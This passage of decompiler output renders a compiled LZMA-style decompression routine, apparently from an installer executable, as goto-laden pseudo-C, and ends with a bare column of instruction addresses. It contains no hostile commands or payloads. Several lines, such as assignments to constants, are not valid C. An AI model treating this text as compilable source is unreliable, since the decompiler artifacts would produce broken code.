											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                  0x00406bf3
                  0x00406bf3
                  0x00406bf3
                  0x00406bf3
                  0x00406bf9
                  0x00406bfd
                  0x00406c01
                  0x00406c0b
                  0x00406c19
                  0x00406eef
                  0x00406eef
                  0x00406ef2
                  0x00406ef9
                  0x00406f26
                  0x00406f26
                  0x00406f2a
                  0x00000000
                  0x00000000
                  0x00406f2c
                  0x00406f35
                  0x00406f3b
                  0x00406f3e
                  0x00406f41
                  0x00406f44
                  0x00406f47
                  0x00406f4d
                  0x00406f66
                  0x00406f69
                  0x00406f75
                  0x00406f76
                  0x00406f79
                  0x00406f4f
                  0x00406f4f
                  0x00406f5e
                  0x00406f61
                  0x00406f61
                  0x00406f83
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f26
                  0x00406f2a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406f85
                  0x00406f85
                  0x00406efe
                  0x00406f02
                  0x0040703a
                  0x0040703a
                  0x00407044
                  0x0040704c
                  0x00407053
                  0x00407055
                  0x0040705c
                  0x00407060
                  0x00407060
                  0x00406f08
                  0x00406f0e
                  0x00406f15
                  0x00406f1d
                  0x00406f1d
                  0x00406f20
                  0x00000000
                  0x00406f20
                  0x00406f8a
                  0x00406f97
                  0x00406f9a
                  0x00406ea6
                  0x00406ea6
                  0x00406ea6
                  0x00406642
                  0x00406642
                  0x00406642
                  0x0040664b
                  0x00000000
                  0x00000000
                  0x00406651
                  0x00406651
                  0x00000000
                  0x00406658
                  0x0040665c
                  0x00000000
                  0x00000000
                  0x00406662
                  0x00406665
                  0x00406668
                  0x0040666b
                  0x0040666f
